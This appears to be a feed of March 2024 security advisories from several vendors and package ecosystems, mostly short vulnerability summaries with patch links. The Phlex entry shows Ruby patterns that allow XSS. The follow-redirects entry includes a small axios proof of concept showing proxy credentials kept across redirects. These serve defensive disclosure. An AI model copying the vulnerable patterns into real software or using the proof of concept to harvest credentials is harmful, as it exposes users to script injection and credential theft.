12.03.2024 09:00:00msrc[MS:CVE-2024-26164] Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26164
12.03.2024 09:00:00msrc[MS:CVE-2024-21330] Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21330
12.03.2024 09:00:00msrc[MS:CVE-2024-21334] Open Management Infrastructure (OMI) Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21334
12.03.2024 09:00:00msrc[MS:CVE-2024-21390] Microsoft Authenticator Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21390
12.03.2024 09:00:00msrc[MS:CVE-2024-21400] Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21400
12.03.2024 09:00:00msrc[MS:CVE-2024-21407] Windows Hyper-V Remote Code Execution Vulnerability (critical)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21407
12.03.2024 09:00:00msrc[MS:CVE-2024-21408] Windows Hyper-V Denial of Service Vulnerability (critical)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21408
12.03.2024 09:00:00msrc[MS:CVE-2024-21419] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21419
12.03.2024 09:00:00msrc[MS:CVE-2024-21427] Windows Kerberos Security Feature Bypass Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21427
12.03.2024 09:00:00msrc[MS:CVE-2024-21431] Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21431
12.03.2024 09:00:00msrc[MS:CVE-2024-21432] Windows Update Stack Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21432
12.03.2024 09:00:00msrc[MS:CVE-2024-21433] Windows Print Spooler Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21433
12.03.2024 09:00:00msrc[MS:CVE-2024-21434] Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21434
12.03.2024 09:00:00msrc[MS:CVE-2024-21435] Windows OLE Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21435
12.03.2024 09:00:00msrc[MS:CVE-2024-21436] Windows Installer Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21436
12.03.2024 09:00:00msrc[MS:CVE-2024-21437] Windows Graphics Component Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21437
12.03.2024 09:00:00msrc[MS:CVE-2024-21440] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21440
12.03.2024 09:00:00msrc[MS:CVE-2024-21448] Microsoft Teams for Android Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21448
12.03.2024 09:00:00msrc[MS:CVE-2024-26160] Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26160
12.03.2024 09:00:00msrc[MS:CVE-2024-26162] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26162
12.03.2024 09:00:00msrc[MS:CVE-2024-26166] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26166
12.03.2024 09:00:00msrc[MS:CVE-2024-26169] Windows Error Reporting Service Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26169
12.03.2024 09:00:00msrc[MS:CVE-2024-26170] Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26170
12.03.2024 09:00:00msrc[MS:CVE-2024-26173] Windows Kernel Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26173
12.03.2024 09:00:00msrc[MS:CVE-2024-26174] Windows Kernel Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26174
12.03.2024 09:00:00msrc[MS:CVE-2024-26176] Windows Kernel Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26176
12.03.2024 09:00:00msrc[MS:CVE-2024-26177] Windows Kernel Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26177
12.03.2024 09:00:00msrc[MS:CVE-2024-26178] Windows Kernel Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26178
12.03.2024 09:00:00msrc[MS:CVE-2024-26181] Windows Kernel Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26181
12.03.2024 09:00:00msrc[MS:CVE-2024-26182] Windows Kernel Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26182
12.03.2024 09:00:00msrc[MS:CVE-2024-26185] Windows Compressed Folder Tampering Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26185
12.03.2024 09:00:00msrc[MS:CVE-2023-28746] Intel: CVE-2023-28746 Register File Data Sampling (RFDS) (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2023-28746
12.03.2024 09:00:00msrc[MS:CVE-2024-26204] Outlook for Android Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26204
12.03.2024 09:00:00msrc[MS:CVE-2024-26165] Visual Studio Code Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26165
12.03.2024 02:00:00redhat[RHSA-2024:1251] kpatch-patch security update (important)This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1251
12.03.2024 02:00:00redhat[RHSA-2024:1249] kernel security and bug fix update (important)The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* (CVE-2024-26602, ?)* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)* kernel: fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409)* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* [rhel-7] INFO: possible circular locking dependency detected: store+0x70/0xe0 kernfs_fop_write+0xe3/0x190 (BZ#2161654)* qedf: Reading /sys/kernel/debug/qedf/hostX/stop_io_on_error can cause panic (BZ#2224973)https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1249
11.03.2024 23:19:00amazonlinux[ALAS2-2024-2491] Amazon Linux 2 2017.12 - ALAS2-2024-2491: medium priority package update for microcode_ctl (medium)Package updates are available for Amazon Linux 2 that fix the following vulnerabilities:CVE-2023-39368: Protection mechanism failure of bus lock regulator for some Intel® Processors may allow an unauthenticated user to potentially enable denial of service via network access.CVE-2023-38575: Non-transparent sharing of return predictor targets between contexts in some Intel® Processors may allow an authorized user to potentially enable information disclosure via local access.https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS2-2024-2491
13.03.2024 22:19:27ubuntu[USN-6587-5] X.Org X Server vulnerabilities (critical)Several security issues were fixed in X.Org X Server.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-5
13.03.2024 21:51:59slackware[SSA:2024-073-01] expat
New expat packages are available for Slackware 15.0 and -current to fix a security issue.
**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/expat-2.6.2-i586-1_slack15.0.txz: Upgraded.
  Prevent billion laughs attacks with isolated use of external parsers.
  For more information, see:
  https://github.com/libexpat/libexpat/commit/1d50b80cf31de87750103656f6eb693746854aa8
  https://www.cve.org/CVERecord?id=CVE-2024-28757
  (* Security fix *)
```
**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/expat-2.6.2-i586-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/expat-2.6.2-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/expat-2.6.2-i586-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/expat-2.6.2-x86_64-1.txz
**MD5 signatures**
Slackware 15.0 package:
41fe8eed9237ced1ce28e63f76f8f1be expat-2.6.2-i586-1_slack15.0.txz
Slackware x86_64 15.0 package:
297e29e85be05ef6be978fdcf44de90a expat-2.6.2-x86_64-1_slack15.0.txz
Slackware -current package:
9c1021caaebd2c18a900f3554352e47e l/expat-2.6.2-i586-1.txz
Slackware x86_64 -current package:
92d7494ad4a18e39ef69aa5f549dd6e3 l/expat-2.6.2-x86_64-1.txz
**Installation instructions**
Upgrade the package as root:
`# upgradepkg expat-2.6.2-i586-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-073-01
13.03.2024 19:17:13ubuntu[USN-6686-2] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-2
13.03.2024 18:43:52ubuntu[USN-6681-3] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6681-3
13.03.2024 18:00:00cisco[CISCO-SA-XRL2VPN-JESRU3FC] Cisco IOS XR Software Layer 2 Services Denial of Service Vulnerability (high)A vulnerability in the Layer 2 Ethernet services of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause the line card network processor to reset, resulting in a denial of service (DoS) condition.This vulnerability is due to the incorrect handling of specific Ethernet frames that are received on line cards that have the Layer 2 services feature enabled. An attacker could exploit this vulnerability by sending specific Ethernet frames through an affected device. A successful exploit could allow the attacker to cause the ingress interface network processor to reset, resulting in a loss of traffic over the interfaces that are supported by the network processor. Multiple resets of the network processor would cause the line card to reset, resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-XRL2VPN-JESRU3FC
13.03.2024 18:00:00cisco[CISCO-SA-SNMP-UHV6ZDEF] Cisco IOS XR Software SNMP Management Plane Protection ACL Bypass Vulnerability (medium)A vulnerability in the UDP forwarding code of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to bypass configured management plane protection policies and access the Simple Network Management Protocol (SNMP) server of an affected device.This vulnerability is due to incorrect UDP forwarding programming when using SNMP with management plane protection. An attacker could exploit this vulnerability by attempting to perform an SNMP operation using broadcast as the destination address that could be processed by an affected device that is configured with an SNMP server. A successful exploit could allow the attacker to communicate to the device on the configured SNMP ports. Although an unauthenticated attacker could send UDP datagrams to the configured SNMP port, only an authenticated user can retrieve or modify data using SNMP requests.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNMP-UHV6ZDEF
13.03.2024 18:00:00 | cisco | [CISCO-SA-IOSXR-SSH-PRIVESC-EWDMKEW3] Cisco IOS XR Software SSH Privilege Escalation Vulnerability (high) | A vulnerability in the SSH client feature of Cisco IOS XR Software for Cisco 8000 Series Routers and Cisco Network Convergence System (NCS) 540 Series and 5700 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device. This vulnerability is due to insufficient validation of arguments that are included with the SSH client CLI command. An attacker with low-privileged access to an affected device could exploit this vulnerability by issuing a crafted SSH client command to the CLI. A successful exploit could allow the attacker to elevate privileges to root on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2023 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75241"]. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-SSH-PRIVESC-EWDMKEW3
13.03.2024 18:00:00 | cisco | [CISCO-SA-IOSXR-SCP-DOS-KB6SUUHW] Cisco IOS XR Software Authenticated CLI Secure Copy Protocol and SFTP Denial of Service Vulnerability (medium) | A vulnerability in the Secure Copy Protocol (SCP) and SFTP feature of Cisco IOS XR Software could allow an authenticated, local attacker to create or overwrite files in a system directory, which could lead to a denial of service (DoS) condition. The attacker would require valid user credentials to perform this attack. This vulnerability is due to a lack of proper validation of SCP and SFTP CLI input parameters. An attacker could exploit this vulnerability by authenticating to the device and issuing SCP or SFTP CLI commands with specific parameters. A successful exploit could allow the attacker to impact the functionality of the device, which could lead to a DoS condition. The device may need to be manually rebooted to recover. Note: This vulnerability is exploitable only when a local user invokes SCP or SFTP commands at the Cisco IOS XR CLI. A local user with administrative privileges could exploit this vulnerability remotely. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"]. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-SCP-DOS-KB6SUUHW
13.03.2024 18:00:00 | cisco | [CISCO-SA-IOSXR-PPPMA-JKWFGNEW] Cisco IOS XR Software for ASR 9000 Series Aggregation Services Routers PPPoE Denial of Service Vulnerability (high) | A vulnerability in the PPP over Ethernet (PPPoE) termination feature of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, adjacent attacker to crash the ppp_ma process, resulting in a denial of service (DoS) condition. This vulnerability is due to the improper handling of malformed PPPoE packets that are received on a router that is running Broadband Network Gateway (BNG) functionality with PPPoE termination on a Lightspeed-based or Lightspeed-Plus-based line card. An attacker could exploit this vulnerability by sending a crafted PPPoE packet to an affected line card interface that does not terminate PPPoE. A successful exploit could allow the attacker to crash the ppp_ma process, resulting in a DoS condition for PPPoE traffic across the router. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"]. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-PPPMA-JKWFGNEW
13.03.2024 18:00:00 | cisco | [CISCO-SA-IOSXR-DHCP-DOS-3TGPKRDM] Cisco IOS XR Software DHCP Version 4 Server Denial of Service Vulnerability (medium) | A vulnerability in the DHCP version 4 (DHCPv4) server feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to trigger a crash of the dhcpd process, resulting in a denial of service (DoS) condition. This vulnerability exists because certain DHCPv4 messages are improperly validated when they are processed by an affected device. An attacker could exploit this vulnerability by sending a malformed DHCPv4 message to an affected device. A successful exploit could allow the attacker to cause a crash of the dhcpd process. While the dhcpd process is restarting, which may take approximately two minutes, DHCPv4 server services are unavailable on the affected device. This could temporarily prevent network access to clients that join the network during that time period and rely on the DHCPv4 server of the affected device. Notes: Only the dhcpd process crashes and eventually restarts automatically. The router does not reload. This vulnerability only applies to DHCPv4. DHCP version 6 (DHCPv6) is not affected. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"]. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-DHCP-DOS-3TGPKRDM
13.03.2024 18:00:00 | cisco | [CISCO-SA-IOSXR-ACL-BYPASS-RZU5NL3E] Cisco IOS XR Software MPLS and Pseudowire Interfaces Access Control List Bypass Vulnerabilities (medium) | Multiple vulnerabilities in the IP access control list (ACL) processing in the ingress direction on MPLS and Pseudowire (PW) interfaces of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. For more information about these vulnerabilities, see the Details ["#details"] section of this advisory. Cisco has released software updates that address these vulnerabilities. There are workarounds that address CVE-2024-20315. There are no workarounds that address CVE-2024-20322. This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"]. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-ACL-BYPASS-RZU5NL3E
13.03.2024 20:11:00 | maven | [MAVEN:GHSA-7G97-7R3C-5CC6] In Quarkus, git credentials could be inadvertently published (low) | A vulnerability was found in Quarkus. In certain conditions related to the CI process, git credentials could be inadvertently published, which could put the git repository at risk. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7G97-7R3C-5CC6
13.03.2024 10:04:31 | ubuntu | [USN-6663-2] OpenSSL update | Add implicit rejection in PKCS#1 v1.5 in OpenSSL. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6663-2
13.03.2024 02:00:00 | debian | [DSA-5639-1] chromium | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5639-1
13.03.2024 02:00:00 | redhat | [RHSA-2024:1308] .NET 7.0 security update (moderate) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.117 and .NET Runtime 7.0.17. Security Fix(es): * dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1308
13.03.2024 02:00:00 | redhat | [RHSA-2024:1311] .NET 8.0 security update (moderate) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.103 and .NET Runtime 8.0.3. Security Fix(es): * dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1311
13.03.2024 02:00:00 | redhat | [RHSA-2024:1309] .NET 7.0 security update (moderate) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.117 and .NET Runtime 7.0.17. Security Fix(es): * dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1309
13.03.2024 02:00:00 | redhat | [RHSA-2024:1310] .NET 8.0 security update (moderate) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.103 and .NET Runtime 8.0.3. Security Fix(es): * dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1310
13.03.2024 23:59:38 | maven | [MAVEN:GHSA-XP2R-G8QQ-44HH] Apache Pulsar: Improper Input Validation in Pulsar Function Worker allows Remote Code Execution (high) | Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XP2R-G8QQ-44HH
13.03.2024 23:58:55 | maven | [MAVEN:GHSA-C35H-W8HJ-MM55] Apache Pulsar: Improper Authentication for Pulsar Proxy Statistics Endpoint (high) | Improper Authentication vulnerability in Apache Pulsar Proxy allows an attacker to connect to the /proxy-stats endpoint without authentication. The vulnerable endpoint exposes detailed statistics about live connections, along with the capability to modify the logging level of proxied connections without requiring proper authentication credentials. This issue affects Apache Pulsar versions from 2.6.0 to 2.10.5, from 2.11.0 to 2.11.2, from 3.0.0 to 3.0.1, and 3.1.0. The known risks include exposing sensitive information such as connected client IP and unauthorized logging level manipulation which could lead to a denial-of-service condition by significantly increasing the proxy's logging overhead. When deployed via the Apache Pulsar Helm chart within Kubernetes environments, the actual client IP might not be revealed through the load balancer's default behavior, which typically obscures the original source IP addresses when externalTrafficPolicy is being configured to "Cluster" by default. The /proxy-stats endpoint contains topic level statistics; however, in the default configuration, the topic level statistics aren't known to be exposed. 2.10 Pulsar Proxy users should upgrade to at least 2.10.6. 2.11 Pulsar Proxy users should upgrade to at least 2.11.3. 3.0 Pulsar Proxy users should upgrade to at least 3.0.2. 3.1 Pulsar Proxy users should upgrade to at least 3.1.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. Additionally, it's imperative to recognize that the Apache Pulsar Proxy is not intended for direct exposure to the internet. The architectural design of Pulsar Proxy assumes that it will operate within a secured network environment, safeguarded by appropriate perimeter defenses. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C35H-W8HJ-MM55
13.03.2024 22:40:37 | maven | [MAVEN:GHSA-G627-R579-RW35] Apache Pulsar: Improper Authorization For Topic-Level Policy Management (moderate) | The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings. These management operations should be restricted to users with the tenant admin role or super user role. This issue affects Apache Pulsar versions from 2.7.1 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Apache Pulsar users should upgrade to at least 2.10.6. 2.11 Apache Pulsar users should upgrade to at least 2.11.4. 3.0 Apache Pulsar users should upgrade to at least 3.0.3. 3.1 Apache Pulsar users should upgrade to at least 3.1.3. 3.2 Apache Pulsar users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G627-R579-RW35
13.03.2024 09:00:00 | msrc | [MS:CVE-2024-21419] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21419
14.03.2024 00:53:09 | rubysec | [RUBYSEC:PHLEX-2024-28199] Cross-site Scripting (XSS) possible with maliciously formed HTML attribute names and values in Phlex (high) |
There is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data. This was due to improper case-sensitivity in the code that was meant to prevent these attacks.

### Impact

If you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user.

```ruby
a(href: user_profile) { "Profile" }
```

If you splat user-provided attributes when rendering any HTML or SVG tag, malicious event attributes could be included in the output, executing JavaScript when the events are triggered by another user.

```ruby
h1(**JSON.parse(user_attributes))
```

### Patches

Patches are [available on RubyGems](https://rubygems.org/gems/phlex) for all `1.x` minor versions. The patched versions are:

- [1.9.1](https://rubygems.org/gems/phlex/versions/1.9.1)
- [1.8.2](https://rubygems.org/gems/phlex/versions/1.8.2)
- [1.7.1](https://rubygems.org/gems/phlex/versions/1.7.1)
- [1.6.2](https://rubygems.org/gems/phlex/versions/1.6.2)
- [1.5.2](https://rubygems.org/gems/phlex/versions/1.5.2)
- [1.4.1](https://rubygems.org/gems/phlex/versions/1.4.1)
- [1.3.3](https://rubygems.org/gems/phlex/versions/1.3.3)
- [1.2.2](https://rubygems.org/gems/phlex/versions/1.2.2)
- [1.1.1](https://rubygems.org/gems/phlex/versions/1.1.1)
- [1.0.1](https://rubygems.org/gems/phlex/versions/1.0.1)

If you are on `main`, it has been patched since [`aa50c60`](https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1).

### Workarounds

Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline) would effectively prevent this vulnerability from being exploited.

### References

In addition to upgrading to a patched version of Phlex, we strongly recommend configuring a Content Security Policy header that does not allow `unsafe-inline`. Here's how you can configure a Content Security Policy header in Rails.

https://guides.rubyonrails.org/security.html#content-security-policy-header

| https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PHLEX-2024-28199
14.03.2024 22:14:06 | msrc | [MS:CVE-2024-2400] Chromium: CVE-2024-2400 Use after free in Performance Manager | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2400
14.03.2024 19:19:43 | npm | [NPM:GHSA-CXJH-PQWP-8MFP] follow-redirects' Proxy-Authorization header kept across hosts (moderate) |
When using axios, its dependency library follow-redirects only clears the authorization header during a cross-domain redirect, but allows the proxy-authentication header, which contains credentials too.

Steps To Reproduce & PoC

axios Test Code

```javascript
const axios = require('axios');

// Request to a local test server (assumed to answer with a cross-domain redirect).
// Header names are deliberately mixed-case.
axios.get('http://127.0.0.1:10081/', {
  headers: {
    'AuThorization': 'Rear Test',
    'ProXy-AuthoriZation': 'Rear Test',
    'coOkie': 't=1'
  }
}).then(function (response) {
  console.log(response);
});
```

When I hit the cross-domain redirect, the sensitive headers like authorization and cookie are cleared, but the proxy-authentication header is kept.

Request sent by axios: [image]

Request sent by follow-redirects after redirect: [image]

Impact

This vulnerability may lead to a credentials leak.

Recommendations

Remove the proxy-authentication header during cross-domain redirect.

Recommended Patch

follow-redirects/index.js:464

```javascript
removeMatchingHeaders(/^(?:authorization|cookie)$/i, this._options.headers);
```

change to

```javascript
removeMatchingHeaders(/^(?:authorization|proxy-authorization|cookie)$/i, this._options.headers);
```

Ref

https://fetch.spec.whatwg.org/#authentication-entries
https://hackerone.com/reports/2390009

| https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CXJH-PQWP-8MFP
14.03.2024 19:15:51 | alpinelinux | [ALPINE:CVE-2023-38575] intel-ucode vulnerability (medium) | [From CVE-2023-38575] Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-38575
